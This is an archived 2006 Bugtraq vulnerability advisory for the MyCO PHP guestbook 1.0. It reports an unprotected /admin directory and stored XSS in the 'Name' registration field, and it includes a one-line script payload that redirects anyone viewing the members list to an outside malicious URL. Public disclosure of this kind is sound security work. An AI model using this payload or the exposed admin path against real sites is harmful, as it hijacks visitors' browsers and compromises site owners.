lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060131080731.26624.qmail@securityfocus.com> Date: 31 Jan 2006 08:07:31 -0000 From: revnic@...il.com To: bugtraq@...urityfocus.com Subject: MyCO multiple vulnerabilities MyCO multiple vulnerabilities Software: MyCO guestbook 1.0 www.punctweb.com Credit: Revnic Vasile revnic@...il.com Description: MyCO is a PHP guestbook that uses a MySQL database Vulnerability: the /admin directory is accessible by everyone. XSS can be injected into the field "Name" when registering a new user. <script>document.location = 'http://some.site/crash_ie.asp';</script> when viewing members list can redirect user's browser to a malicious site.